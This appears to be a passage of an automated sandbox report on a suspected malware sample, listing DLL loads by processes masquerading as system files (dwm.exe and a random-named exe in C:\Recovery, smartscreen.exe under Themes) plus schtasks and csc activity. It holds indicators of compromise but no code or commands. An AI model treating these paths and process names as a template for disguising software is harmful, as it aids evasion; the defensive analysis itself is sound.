                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: mscoree.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: apphelp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: version.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: uxtheme.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: windows.storage.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: wldp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: profapi.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: cryptsp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: rsaenh.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: cryptbase.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: sspicli.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: mscoree.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: version.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: uxtheme.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: windows.storage.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: wldp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: profapi.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: cryptsp.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: rsaenh.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: cryptbase.dll
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeSection loaded: sspicli.dll
Source: C:\Recovery\dwm.exe | Section loaded: mscoree.dll
Source: C:\Recovery\dwm.exe | Section loaded: apphelp.dll
Source: C:\Recovery\dwm.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\dwm.exe | Section loaded: version.dll
Source: C:\Recovery\dwm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dwm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dwm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dwm.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\dwm.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\dwm.exe | Section loaded: wldp.dll
Source: C:\Recovery\dwm.exe | Section loaded: profapi.dll
Source: C:\Recovery\dwm.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\dwm.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\dwm.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\dwm.exe | Section loaded: sspicli.dll
Source: C:\Recovery\dwm.exe | Section loaded: mscoree.dll
Source: C:\Recovery\dwm.exe | Section loaded: apphelp.dll
Source: C:\Recovery\dwm.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\dwm.exe | Section loaded: version.dll
Source: C:\Recovery\dwm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dwm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dwm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dwm.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\dwm.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\dwm.exe | Section loaded: wldp.dll
Source: C:\Recovery\dwm.exe | Section loaded: profapi.dll
Source: C:\Recovery\dwm.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\dwm.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\dwm.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\dwm.exe | Section loaded: sspicli.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: mscoree.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: apphelp.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: version.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: wldp.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: profapi.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: sspicli.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: mscoree.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: version.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: wldp.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: profapi.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: sspicli.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: mscoree.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: kernel.appcore.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: version.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: uxtheme.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: windows.storage.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: wldp.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: profapi.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: cryptsp.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: rsaenh.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: cryptbase.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: sspicli.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: mscoree.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: kernel.appcore.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: version.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: uxtheme.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: windows.storage.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: wldp.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: profapi.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: cryptsp.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: rsaenh.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: cryptbase.dll
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Section loaded: sspicli.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: mscoree.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: apphelp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: version.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: wldp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: profapi.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: sspicli.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: mscoree.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: version.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: wldp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: profapi.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: sspicli.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: ktmw32.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: rasman.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: rtutils.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: mswsock.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: winhttp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: winnsi.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: propsys.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: apphelp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: dlnashext.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: wpdshext.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: edputil.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: urlmon.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: iertutil.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: srvcli.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: netutils.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: wintypes.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: appresolver.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: slc.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: userenv.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: sppc.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: mscoree.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: version.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: wldp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: profapi.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Resources\Themes\smartscreen.exe | Section loaded: sspicli.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: mscoree.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: version.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: wldp.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: profapi.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: EjS7Q5fFCE.exe | Static file information: File size 2009852 > 1048576
Source: EjS7Q5fFCE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
